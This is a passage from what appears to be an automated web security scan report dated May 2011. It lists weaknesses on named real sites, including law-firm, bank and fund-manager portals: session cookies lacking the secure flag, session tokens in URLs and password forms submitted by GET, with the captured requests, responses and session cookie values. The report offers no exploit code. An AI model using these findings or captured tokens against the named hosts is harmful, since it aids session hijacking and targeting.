Content-Length: 2532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta htt
...[SNIP]...

8.8. https://cle-files.tuckerellis.com/register

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cle-files.tuckerellis.com
Path:   /register

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /register HTTP/1.1
Host: cle-files.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://cle-files.tuckerellis.com/
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.9.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West; _filetransfer_session=9f3e69b83e302794ac0d585e9faf9b16

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Thu, 12 May 2011 12:25:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: _filetransfer_session=9f3e69b83e302794ac0d585e9faf9b16; path=/; expires=Thu, 19 May 2011 12:25:59 GMT; HttpOnly
Status: 200
ETag: "a849a16be06d2272b0f50b58f60ebb30"
X-Runtime: 36
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta htt
...[SNIP]...

8.9. https://secure.reportingsystem.com/TPG/index.cfm

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.reportingsystem.com
Path:   /TPG/index.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TPG/index.cfm HTTP/1.1
Host: secure.reportingsystem.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:24:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=2712786;HttpOnly;Secure
Set-Cookie: CFTOKEN=81013834;HttpOnly;Secure
Set-Cookie: JSESSIONID=4830b14a24305d117a65TR;HttpOnly;Secure
Set-Cookie: CFID=2712786;expires=Sat, 04-May-2041 11:24:35 GMT;path=/
Set-Cookie: CFTOKEN=81013834;expires=Sat, 04-May-2041 11:24:35 GMT;path=/
Set-Cookie: JSESSIONID=4830b14a24305d117a65TR;path=/
Expires: {ts '2011-05-12 07:24:35'}
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

   <META HTT
...[SNIP]...

8.10. https://services.sungarddx.com/Default.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://services.sungarddx.com
Path:   /Default.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Default.aspx?DN=1,Documents&URL=DN=161476,1,Documents HTTP/1.1
Host: services.sungarddx.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerinvspdxweb001_002_003_004=2526607763.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=clqz2055hje3y2npayqilzyg; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Date: Thu, 12 May 2011 11:41:31 GMT
Content-Length: 14829


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >


<script language="javascript">
   if (
...[SNIP]...

8.11. https://services.sungarddx.com/common/js/AdminFunctions.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://services.sungarddx.com
Path:   /common/js/AdminFunctions.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /common/js/AdminFunctions.asp HTTP/1.1
Host: services.sungarddx.com
Connection: keep-alive
Referer: https://services.sungarddx.com/Default.aspx?DN=1,Documents&URL=DN=161476,1,Documents
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerinvspdxweb001_002_003_004=2526607763.20480.0000; ASP.NET_SessionId=y0p1pwqsypoej3ybg3zrlm2v

Response

HTTP/1.1 200 OK
Cache-Control: PUBLIC
Content-Length: 6977
Content-Type: text/html
Expires: Thu, 12 May 2011 23:40:46 GMT
Last-Modified: Thu, 12 May 2011 11:40:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQBBSCRR=EAGLHBFBJGMGAJGCNKJEJDGG; path=/
Date: Thu, 12 May 2011 11:40:46 GMT


//<script language="javascript">
//<!--
///<summary>
///Misc administrative functions
///</summary>
///<scope>both</scope>


///<summary>
/// Used to get into the console and backend stuf
...[SNIP]...

8.12. https://services.sungarddx.com/js/source.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://services.sungarddx.com
Path:   /js/source.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/source.asp HTTP/1.1
Host: services.sungarddx.com
Connection: keep-alive
Referer: https://services.sungarddx.com/Default.aspx?DN=1,Documents&URL=DN=161476,1,Documents
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerinvspdxweb001_002_003_004=2526607763.20480.0000; ASP.NET_SessionId=y0p1pwqsypoej3ybg3zrlm2v

Response

HTTP/1.1 200 OK
Cache-Control: PUBLIC
Content-Length: 92885
Content-Type: application/x-javascript
Expires: Thu, 12 May 2011 23:40:44 GMT
Last-Modified: Thu, 12 May 2011 11:40:44 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQBBSCRR=DAGLHBFBNBLDAFJEJOEBHHML; path=/
Date: Thu, 12 May 2011 11:40:44 GMT

//<!--

///<summary>
/// Attempt to find something to focus on while on the PSI form page
///</summary>
function DoPSIFocus()
{
try
{
var oLogin = document.forms["Inputform"].
...[SNIP]...

8.13. https://webmail.tuckerellis.com/exchweb/bin/auth/owaauth.dll

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://webmail.tuckerellis.com
Path:   /exchweb/bin/auth/owaauth.dll

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /exchweb/bin/auth/owaauth.dll HTTP/1.1
Host: webmail.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://webmail.tuckerellis.com/exchweb/bin/auth/owalogon.asp?url=https://webmail.tuckerellis.com/exchange&reason=0
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.11.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West
Content-Type: application/x-www-form-urlencoded
Content-Length: 117

destination=https%3A%2F%2Fwebmail.tuckerellis.com%2Fexchange&flags=4&username=&password=&SubmitCreds=Log+On&trusted=4

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: https://webmail.tuckerellis.com/exchange
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: sessionid=15a97208-bb3b-4ddc-80a0-5c9c656a7d79; path=/
Set-Cookie: cadata="6WdwQVCBbctZn0rLEzGKc1Dh9KPVSIJ4Y4z3MLg=="; HttpOnly; secure; path=/
Date: Thu, 12 May 2011 12:35:12 GMT


8.14. https://ww3.janus.com/advisor/about-janus

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://ww3.janus.com
Path:   /advisor/about-janus

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /advisor/about-janus?WT.mc_id=102162&WT.srch=1 HTTP/1.1
Host: ww3.janus.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server:
Cache-Control: no-store
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
X-Powered-By: JSP/2.1
Set-Cookie: JSESSIONID=3eb42bec6b9f100ffd3113f47057; Path=/advisor
Content-Type: text/html;charset=UTF-8
Date: Thu, 12 May 2011 11:15:36 GMT
Set-Cookie: vj-ww3-advisor=3557560492.20480.0000; path=/
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 26435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<h
...[SNIP]...

8.15. https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.usaa.com
Path:   /inet/imco_mutualfund/ImMutualFunds

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inet/imco_mutualfund/ImMutualFunds?FundGroup=EQ&adid=icmsch105989004 HTTP/1.1
Host: www.usaa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Env: DCITC
Content-Type: text/html
Content-Language: en-US
Date: Thu, 12 May 2011 11:24:17 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=0001Y8Xm6NLmr5TSgq_ZSnYB1Cq:152vuh6gi; Path=/inet; Domain=.usaa.com
Set-Cookie: MemberGlobalSession=2:1001:4WCSMG1D143X7EVESDUQU; Path=/; Domain=.usaa.com; Secure
Set-Cookie: tempCookie=testCookie
Set-Cookie: dcenv=DCITC; path=/; domain=usaa.com
Content-Length: 5180

<html>
<head>
<noscript><meta http-equiv="refresh" content="0; url=https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds?FundGroup=EQ&adid=icmsch105989004&bpjs=false"></noscript>
<script language="J
...[SNIP]...

8.16. https://personal.vanguard.com/us/funds/snapshot

Summary

Severity:   Information
Confidence:   Certain
Host:   https://personal.vanguard.com
Path:   /us/funds/snapshot

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1 HTTP/1.1
Host: personal.vanguard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:09:22 GMT
Content-type: text/html; charset=ISO-8859-1
Set-Cookie: TLTSID=4A6B94427C88107C0D0888D5141005F1; Path=/; Domain=.vanguard.com
Set-Cookie: TLTUID=4A6B94427C88107C0D0888D5141005F1; Path=/; Domain=.vanguard.com; Expires=Thu, 12-05-2021 11:09:22 GMT
Content-language: en
Set-cookie: JSESSIONID=0000NlNxb4pkRjQ9SuyVJzXRQ-V:15o5flja9; Path=/; Domain=.vanguard.com; Secure
Set-cookie: SSLB=0; Path=/; Domain=.vanguard.com
Set-Cookie: HNWPRD=D21;path=/;domain=.vanguard.com;
Content-Length: 62217



...[SNIP]...

8.17. https://services.sungarddx.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://services.sungarddx.com
Path:   /default.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /default.aspx?FM=Providence+Funds HTTP/1.1
Host: services.sungarddx.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /default.aspx?DN=161476,1,Documents
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Date: Thu, 12 May 2011 11:41:31 GMT
Content-Length: 162
Set-Cookie: BIGipServerinvspdxweb001_002_003_004=2526607763.20480.0000; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fdefault.aspx%3fDN%3d161476%2c1%2cDocuments">here</a>.</h2>
</body></html>

8.18. https://virtualoffice.tuckerellis.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://virtualoffice.tuckerellis.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: virtualoffice.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tuckerellis.com/info/employee-access
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.11.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:33:53 GMT
Server: SonicWALL SSL-VPN Web Server
X-UA-Compatible: IE=EmulateIE7
Set-Cookie: sslvpn_AOPortal_virtualoffice.tuckerellis.com=false; path=/;
Keep-Alive: timeout=20, max=25
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 173

<HTML>
<HEAD><meta http-equiv="refresh" content="0; URL=/cgi-bin/welcome">
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</HEAD>
<BODY> </BODY>
</HTML>

8.19. https://ww3.janus.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ww3.janus.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: ww3.janus.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vj-ww3-advisor=3540783276.20480.0000

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:23:51 GMT
Content-length: 1078
Content-type: image/x-icon
Etag: "49d1b3b5-1-436-0"
Last-modified: Thu, 05 May 2011 10:16:06 GMT
Accept-ranges: bytes
Set-Cookie: vj-ww3=3758887084.20480.0000; path=/

...[SNIP]...

8.20. https://www.wellsfargo.com/jump/theprivatebank/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/theprivatebank/index

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jump/theprivatebank/index HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 12 May 2011 11:07:47 GMT
Content-length: 8767
Content-type: text/html; charset=ISO-8859-1
Set-Cookie: v1st=860BCE3A6686392; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Set-Cookie: wcmcookiewf=2YvRNL1DhnQJXpvqtrRMH62pV5nkJ3W9wswYr5TSXhRqMGc2yXqQ!-1621466656; domain=.wellsfargo.com; path=/; secure
Set-Cookie: wfacookie=B-20110512040747952746006; domain=.wellsfargo.com; expires=Sunday, 09-May-2021 11:07:47 GMT; path=/
Content-Language: en-US
Set-Cookie: ISD_WCM_COOKIE=876747786.16927.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/javasc
...[SNIP]...

9. Session token in URL
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


9.1. http://by.optimost.com/counter/553/-/129/event.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://by.optimost.com
Path:   /counter/553/-/129/event.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /counter/553/-/129/event.js?opZone=private-equity&D_ts=1305198189&D_tzo=300&D_loc=http%3A//www.ft.com/indepth/privateequity&D_ckl=222&opFTData=%26v%3D1&opTrackSess=%26t%3D1 HTTP/1.1
Host: by.optimost.com
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Fast
P3p: CP="DEV IND NOI OTC OUR PSA PSD"
Content-Type: application/x-javascript
Expires: Thu, 12 May 2011 11:03:16 GMT
Pragma: no-cache
Date: Thu, 12 May 2011 11:03:16 GMT
Content-Length: 25
Connection: close
Cache-Control: max-age=0, no-cache, no-store

var __counter_unused = 0;

9.2. http://l.sharethis.com/pview

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&source=share5x&publisher=c6403dd8-336d-401f-a09b-5b7184ac72dc&hostname=www.mimecast.com&location=%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director%2F&url=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director%2F&sessionID=1305203802369.25147&fpc=303c07d-12fe4358101-13064b3c-1&ts1305203804180.0 HTTP/1.1
Host: l.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Thu, 12 May 2011 12:36:44 GMT
Connection: keep-alive


9.3. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_925756&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_925756&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.164.62
X-Cnection: close
Date: Thu, 12 May 2011 10:59:39 GMT
Content-Length: 0


10. Password field submitted using GET method
There are 3 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


10.1. https://secure.reportingsystem.com/TPG/index.cfm

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.reportingsystem.com
Path:   /TPG/index.cfm

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET /TPG/index.cfm HTTP/1.1
Host: secure.reportingsystem.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:24:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=2712786;HttpOnly;Secure
Set-Cookie: CFTOKEN=81013834;HttpOnly;Secure
Set-Cookie: JSESSIONID=4830b14a24305d117a65TR;HttpOnly;Secure
Set-Cookie: CFID=2712786;expires=Sat, 04-May-2041 11:24:35 GMT;path=/
Set-Cookie: CFTOKEN=81013834;expires=Sat, 04-May-2041 11:24:35 GMT;path=/
Set-Cookie: JSESSIONID=4830b14a24305d117a65TR;path=/
Expires: {ts '2011-05-12 07:24:35'}
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

   <META HTT
...[SNIP]...
<div id="fForm" class="fForm">
<form name="LogIn" id="LogIn">
<INPUT TYPE="text" NAME="userid" id="userid" SIZE="20" MAXLENGTH="100" >
<INPUT TYPE="password" NAME="pwd" id="pwd" SIZE="20" MAXLENGTH="50" >
</form>
...[SNIP]...

10.2. https://secure.reportingsystem.com/carlyle/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.reportingsystem.com
Path:   /carlyle/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET /carlyle/ HTTP/1.1
Host: secure.reportingsystem.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=1596924; CFTOKEN=63855037; JSESSIONID=2230e705445e33585ac4TR

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:41:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=1596924;HttpOnly;Secure
Set-Cookie: CFTOKEN=63855037;HttpOnly;Secure
Set-Cookie: JSESSIONID=2230e705445e33585ac4TR;HttpOnly;Secure
Expires: {ts '2011-05-12 07:41:10'}
Content-Type: text/html; charset=UTF-8

